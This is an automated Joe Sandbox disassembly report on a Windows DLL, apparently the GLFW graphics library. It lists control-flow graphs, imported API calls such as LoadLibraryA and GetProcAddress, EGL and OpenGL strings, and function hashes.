                                                                            control_flow_graph 342 646021f7-64602223 343 64602599-6460259f 342->343 344 64602229-6460222d 342->344 345 64602245-6460224d 344->345 346 6460222f-64602243 LoadLibraryA 344->346 347 64602268-64602425 strncmp GetProcAddress * 16 345->347 348 6460224f-64602263 call 64602ef4 345->348 346->344 346->345 350 6460242b-64602432 347->350 351 646024ae-646024bd call 64602ef4 347->351 355 646024c7-646024c9 348->355 350->351 354 64602434-6460243c 350->354 356 646024c2 call 646021b5 351->356 354->351 357 6460243e-64602445 354->357 355->343 356->355 357->351 359 64602447-6460244e 357->359 359->351 360 64602450-64602457 359->360 360->351 361 64602459-64602460 360->361 361->351 362 64602462-64602469 361->362 362->351 363 6460246b-64602472 362->363 363->351 364 64602474-6460247b 363->364 364->351 365 6460247d-64602484 364->365 365->351 366 64602486-6460248d 365->366 366->351 367 6460248f-64602496 366->367 367->351 368 64602498-6460249f 367->368 368->351 369 646024a1-646024a8 368->369 369->351 370 646024aa-646024ac 369->370 370->351 371 646024ce-646024df 370->371 373 646024e1-646024f8 call 64601f54 371->373 374 646024fa-64602518 371->374 383 64602531-6460253d call 64602ef4 373->383 378 6460251a-6460252d call 64601f54 374->378 379 6460253f-64602594 call 64601fb6 * 5 374->379 378->383 379->343 383->356
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32 ref: 64602235
                                                                            • strncmp.MSVCRT ref: 6460227B
                                                                            • GetProcAddress.KERNEL32 ref: 6460229E
                                                                            • GetProcAddress.KERNEL32 ref: 646022B7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 646022D0
                                                                            • GetProcAddress.KERNEL32 ref: 646022E9
                                                                            • GetProcAddress.KERNEL32 ref: 64602302
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 6460231B
                                                                            • GetProcAddress.KERNEL32 ref: 64602334
                                                                            • GetProcAddress.KERNEL32 ref: 6460234D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 64602366
                                                                            • GetProcAddress.KERNEL32 ref: 6460237F
                                                                            • GetProcAddress.KERNEL32 ref: 64602398
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 646023B1
                                                                            • GetProcAddress.KERNEL32 ref: 646023CA
                                                                            • GetProcAddress.KERNEL32 ref: 646023E3
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 646023FC
                                                                            • GetProcAddress.KERNEL32 ref: 64602415
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadstrncmp
                                                                            • String ID: $Had$EGL.dll$EGL: Failed to get EGL display: %s$EGL: Failed to load required entry points$EGL: Library not found$EGL_KHR_context_flush_control$EGL_KHR_create_context$EGL_KHR_create_context_no_error$EGL_KHR_get_all_proc_addresses$EGL_KHR_gl_colorspace$eglGetConfigAttrib$eglGetDisplay$eglGetProcAddress$eglInitialize$eglMakeCurrent$eglQueryString$eglSwapBuffers$eglSwapInterval$lib$libEGL.dll
                                                                            • API String ID: 1199942516-1957977352
                                                                            • Opcode ID: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
                                                                            • Instruction ID: 2be6e0a8a46068feab80a72f97e01e57a28abbd52c323695223df50d50299026
                                                                            • Opcode Fuzzy Hash: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
                                                                            • Instruction Fuzzy Hash: 8FA12BB450E380DFDB26DF6AC6857AAFBE4FF56708F01992DE49487640D3B58880CB52

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 397 64601b16-64601b8a call 6460ad78 glfwMakeContextCurrent 402 64601d00 397->402 403 64601b90-64601b92 397->403 404 64601d08 402->404 403->402 405 64601b98-64601ba9 403->405 406 64601d0f call 64602ef4 404->406 410 64601bd0-64601bd4 405->410 411 64601bab-64601bb4 405->411 407 64601d14-64601d1e glfwMakeContextCurrent 406->407 409 64601ec6-64601ecf 407->409 412 64601c11-64601c43 sscanf 410->412 413 64601bd6-64601c02 strlen strncmp 410->413 414 64601bc3-64601bcb 411->414 415 64601bb6-64601bbe 411->415 417 64601c45-64601c4f 412->417 418 64601c7c-64601c8a 412->418 413->410 416 64601c04-64601c0e 413->416 414->404 415->404 416->412 419 64601c51-64601c59 417->419 420 64601c5b 417->420 421 64601c9c-64601cc2 418->421 422 64601c8c 418->422 423 64601c63 419->423 420->423 426 64601cc4-64601ccc 421->426 427 64601cce 421->427 424 64601ce4-64601ce7 422->424 425 64601c8e-64601c9a 422->425 431 64601c6a call 64602ef4 423->431 429 64601d23-64601d2d 424->429 430 64601ce9-64601cfe 424->430 425->421 425->424 428 64601cd6 426->428 427->428 432 64601cdd call 64602ef4 428->432 434 64601e02 429->434 435 64601d33-64601d3a 429->435 430->402 430->429 433 64601c6f-64601c77 glfwMakeContextCurrent 431->433 436 64601ce2 432->436 433->409 437 64601e09-64601e10 glfwExtensionSupported 434->437 439 64601d9c-64601da3 435->439 440 64601d3c-64601d57 435->440 436->407 441 64601e12-64601e30 437->441 442 64601e4f-64601e5d glfwExtensionSupported 437->442 443 64601db0-64601dcb 439->443 444 64601da5 439->444 450 64601d63-64601d65 440->450 451 64601d59 440->451 457 64601e32-64601e3c 441->457 458 64601e3e-64601e43 441->458 448 64601e99-64601ec1 glfwMakeContextCurrent 442->448 449 64601e5f-64601e7a 442->449 460 64601dd9-64601ddb 443->460 461 64601dcd-64601dd7 443->461 446 64601da7-64601dae 444->446 447 64601df9-64601e00 444->447 446->443 446->447 447->437 448->409 467 64601e88-64601e8d 449->467 468 64601e7c-64601e86 449->468 454 64601d73-64601d81 glfwExtensionSupported 450->454 455 64601d67-64601d71 450->455 451->450 464 64601d8c-64601d90 454->464 465 64601d83-64601d8a 454->465 455->464 457->442 458->442 466 64601e45 458->466 462 64601de9-64601df7 glfwExtensionSupported 460->462 463 64601ddd-64601de7 460->463 461->447 462->447 462->461 463->447 464->439 471 64601d92 464->471 465->455 465->464 466->442 467->448 469 64601e8f 467->469 468->448 469->448 471->439
                                                                            APIs
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • glfwMakeContextCurrent.GLFW.3927611081 ref: 64601B58
                                                                            • strlen.MSVCRT ref: 64601BDF
                                                                            • strncmp.MSVCRT ref: 64601BF5
                                                                            • sscanf.MSVCRT ref: 64601C3A
                                                                            • glfwMakeContextCurrent.GLFW.3927611081 ref: 64601C72
                                                                            • glfwMakeContextCurrent.GLFW.3927611081 ref: 64601D19
                                                                            • glfwExtensionSupported.GLFW.3927611081(00000000,00000000), ref: 64601D7A
                                                                            • glfwExtensionSupported.GLFW.3927611081(00000000,00000000), ref: 64601DF0
                                                                            • glfwExtensionSupported.GLFW.3927611081 ref: 64601E09
                                                                            • glfwExtensionSupported.GLFW.3927611081 ref: 64601E56
                                                                            • glfwMakeContextCurrent.GLFW.3927611081 ref: 64601EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: glfw$ContextCurrent.ExtensionMakeSupported.$Valuesscanfstrlenstrncmp
                                                                            • String ID: %d.%d.%d$Entry point retrieval is broken$GL_ARB_compatibility$GL_ARB_debug_output$GL_ARB_robustness$GL_EXT_robustness$GL_KHR_context_flush_control$OpenGL ES version string retrieval is broken$OpenGL version string retrieval is broken$Requested OpenGL ES version %i.%i, got version %i.%i$`Dad$glClear$glGetIntegerv$glGetString$glGetStringi
                                                                            • API String ID: 1542904474-82678582
                                                                            • Opcode ID: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
                                                                            • Instruction ID: ec955498274e6c36eaf435dfca11977ababeb186932dd94b9ddddddf6aa5bf5a
                                                                            • Opcode Fuzzy Hash: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
                                                                            • Instruction Fuzzy Hash: D5A115B09082059BDB099F69C2847DEBBF4FF54B0CF04C82EDC989B245D7B68581CB62

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 693 646025a0-646025b3 694 646025b5-646025c4 693->694 695 646025c9-646025d1 693->695 696 6460281b-64602820 call 64602ef4 694->696 697 646025d3 695->697 698 646025d9-64602607 695->698 702 64602b55-64602b57 696->702 697->698 703 64602622-6460267b calloc * 2 698->703 704 64602609-6460261d call 64602ef4 698->704 705 64602c7f-64602c88 702->705 710 64602685-64602691 703->710 709 6460280c-64602814 704->709 709->696 711 64602697-646026b7 call 64601f6c 710->711 712 646027be-646027e1 call 64601627 710->712 717 646027b3-646027b9 711->717 718 646026bd-646026cb call 64601f6c 711->718 719 646027e3-646027e6 712->719 720 646027ec-6460280a free * 2 712->720 717->710 718->717 726 646026d1-646026db 718->726 719->720 720->709 722 64602825-64602833 720->722 723 64602835-64602841 722->723 724 6460285c-64602868 722->724 733 64602843-6460285a call 64601f54 723->733 734 6460288d-64602899 723->734 724->734 735 6460286a-6460287d call 64601f54 724->735 729 646026e1-646026ef 726->729 730 64602795-6460279a 726->730 736 646026f5-646026fa call 64601f6c 729->736 737 64602789-64602790 call 64601f6c 729->737 731 646027a0-646027ae call 64601f6c 730->731 732 64602702-64602787 call 64601f6c * 7 730->732 755 646026fc 731->755 732->717 771 64602881-64602888 733->771 740 646029cf-646029d5 734->740 741 6460289f-646028a5 734->741 735->771 736->755 737->755 750 646029f2-646029f9 740->750 751 646029d7-646029ed 740->751 746 646028d3-646028d5 741->746 747 646028a7-646028ac 741->747 762 646028d7-646028de 746->762 759 646028b3-646028c3 747->759 760 646028ae 747->760 756 64602a48-64602a92 750->756 757 646029fb-64602a0a 750->757 751->750 755->717 755->732 781 64602a94-64602ab2 call 64601f54 756->781 782 64602ab7-64602abf 756->782 764 64602a27-64602a2d 757->764 765 64602a0c-64602a25 757->765 759->762 767 646028c5-646028d1 759->767 760->759 769 646028e0 762->769 770 646028e3-646028eb 762->770 764->756 772 64602a2f-64602a3d 764->772 765->756 767->762 769->770 775 64602931-64602938 770->775 776 646028ed-646028f2 770->776 777 64602b50 call 64602ef4 771->777 772->756 778 6460293a-64602941 775->778 779 6460295c-6460296b 775->779 783 646028f4-64602908 776->783 784 6460290a-6460290f 776->784 777->702 778->779 787 64602943-64602959 778->787 788 64602971-64602994 779->788 789 6460296d-6460296f 779->789 781->777 792 64602ac1-64602ac8 782->792 793 64602ae3-64602b30 782->793 794 64602925-6460292a 783->794 785 64602911-6460291b 784->785 786 6460292c 784->786 785->794 795 6460292e 786->795 787->779 796 6460299b-6460299d 788->796 789->788 789->796 792->793 799 64602aca-64602ad9 792->799 805 64602b32-64602b49 call 64601f54 793->805 806 64602b5c-64602b73 793->806 794->795 795->775 802 646029b4-646029b6 796->802 803 6460299f-646029b1 796->803 799->793 802->750 809 646029b8-646029cd 802->809 803->802 805->777 810 64602b79-64602bb6 806->810 811 64602c3b-64602c75 806->811 809->750 814 64602bf8-64602bfc 810->814 815 64602bb8-64602bcb 810->815 811->705 817 64602bcd-64602bf3 strncmp 814->817 818 64602bfe-64602c23 814->818 815->814 823 64602c00-64602c15 LoadLibraryA 817->823 824 64602bf5 817->824 818->811 827 64602c25-64602c39 call 64602ef4 818->827 823->824 826 64602c17 823->826 824->814 826->811 827->705
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoadstrncmp
                                                                            • String ID: 0ad$80$80$EGL: API not available$EGL: Failed to create window surface: %s$EGL: Failed to find a suitable EGLConfig$EGL: Failed to load client library$lib$mIad
                                                                            • API String ID: 2374402810-160528034
                                                                            • Opcode ID: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
                                                                            • Instruction ID: 12e493b34a711624c8fe5681839838a58ab6d86c7415c144379c5bb511d2725b
                                                                            • Opcode Fuzzy Hash: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
                                                                            • Instruction Fuzzy Hash: 860236B4A093048FDB59DF18D68479ABBF5EF44708F10C8AAE8899B240D775DD89CF42

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$ByteCharDisplayEnumMultiWidewcscpy$CreateDeleteMonitorsSettingsfree
                                                                            • String ID: $Z
                                                                            • API String ID: 2479431636-3176842942
                                                                            • Opcode ID: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
                                                                            • Instruction ID: 8ed80cccbdc88c8452718737337ac4828fed65368ce2b2488aeba01ce2f50826
                                                                            • Opcode Fuzzy Hash: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
                                                                            • Instruction Fuzzy Hash: B691F6B0909319DFDB24DF29C9447DABBF0FF98710F0189ADE498A7240D7749A848F82
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32 ref: 6460739E
                                                                            • GetProcAddress.KERNEL32 ref: 646073CC
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 646073E5
                                                                            • GetProcAddress.KERNEL32(00000001,00000001), ref: 646073FE
                                                                            • GetProcAddress.KERNEL32 ref: 64607417
                                                                            • GetProcAddress.KERNEL32 ref: 64607430
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 64607449
                                                                            • GetProcAddress.KERNEL32(00000001,00000001), ref: 64607462
                                                                            • GetDC.USER32 ref: 64607476
                                                                            • ChoosePixelFormat.GDI32 ref: 646074A6
                                                                            • SetPixelFormat.GDI32(?,?), ref: 646074B9
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Format$Pixel$ByteCharChooseErrorLastLibraryLoadMessageMultiWide
                                                                            • String ID: %$(
                                                                            • API String ID: 3228403986-93983813
                                                                            • Opcode ID: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
                                                                            • Instruction ID: a37b7c411e3238bfb69914b12a3eadec3a1d8eee3d0a0b02257eea71e55caaa7
                                                                            • Opcode Fuzzy Hash: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
                                                                            • Instruction Fuzzy Hash: 199128B0909394DFDB12EFAAC54466DFBF4FB46719F01A82DE48487240D7B68444CB53
                                                                            APIs
                                                                            • GetPropW.USER32 ref: 6460D18E
                                                                            • EnableNonClientDpiScaling.USER32 ref: 6460D1DE
                                                                              • Part of subcall function 6460A331: calloc.MSVCRT ref: 6460A359
                                                                              • Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A3B9
                                                                              • Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A41F
                                                                              • Part of subcall function 6460A331: wcscmp.MSVCRT ref: 6460A469
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DevicesDisplayEnum$ClientEnablePropScalingcallocwcscmp
                                                                            • String ID: ($Q
                                                                            • API String ID: 2143186849-614157966
                                                                            • Opcode ID: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
                                                                            • Instruction ID: 56b1b2e10414c6ed154da36c08ccab621a88ac399964cde2fba271c26f532041
                                                                            • Opcode Fuzzy Hash: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
                                                                            • Instruction Fuzzy Hash: 07E13B70A04308CFDB18DFA9CA8469EBBF0FF55B14F00CA2AE5959B295D774A845CF42
                                                                            APIs
                                                                            • GetDpiForWindow.USER32 ref: 6460CA41
                                                                              • Part of subcall function 6460B0A6: SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
                                                                              • Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B10C
                                                                              • Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B130
                                                                            • GetWindowLongW.USER32 ref: 6460CB3B
                                                                            • SetWindowLongW.USER32(00000150,00000150), ref: 6460CB6D
                                                                            • GetMonitorInfoW.USER32 ref: 6460CB8A
                                                                            • SetWindowPos.USER32 ref: 6460CCFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Info$LongParametersSystem$ExecutionMonitorStateThread
                                                                            • String ID: (
                                                                            • API String ID: 3930307586-3887548279
                                                                            • Opcode ID: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
                                                                            • Instruction ID: ce95d183200969ec0ec3218b39cb76092ca63e45640ddd5fc6678acc3372c675
                                                                            • Opcode Fuzzy Hash: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
                                                                            • Instruction Fuzzy Hash: FAA107B0A083059FDB08EF69D98468EBBF0EF88714F10C92DE89997355D774D905CB92
                                                                            APIs
                                                                            • UnregisterDeviceNotification.USER32 ref: 64608FAD
                                                                            • DestroyWindow.USER32(?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024,?,646030E9), ref: 64608FC0
                                                                            • SystemParametersInfoW.USER32 ref: 64608FEC
                                                                            • free.MSVCRT ref: 64608FFD
                                                                            • free.MSVCRT ref: 6460900A
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460902A
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460903D
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609050
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609063
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609076
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609089
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460909C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$free$DestroyDeviceInfoNotificationParametersSystemUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 1825173338-0
                                                                            • Opcode ID: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
                                                                            • Instruction ID: 4751eaf6b87ea121d633ef41e038374e24d4eed0c9cabd56117908b4e63011e8
                                                                            • Opcode Fuzzy Hash: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
                                                                            • Instruction Fuzzy Hash: FA31DAB0608381DFEF15BFBACA88A1ABBE8FB15645F01A86CE495C7240DB75D540CB51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: callocstrcpy
                                                                            • String ID: ,
                                                                            • API String ID: 2080364334-3772416878
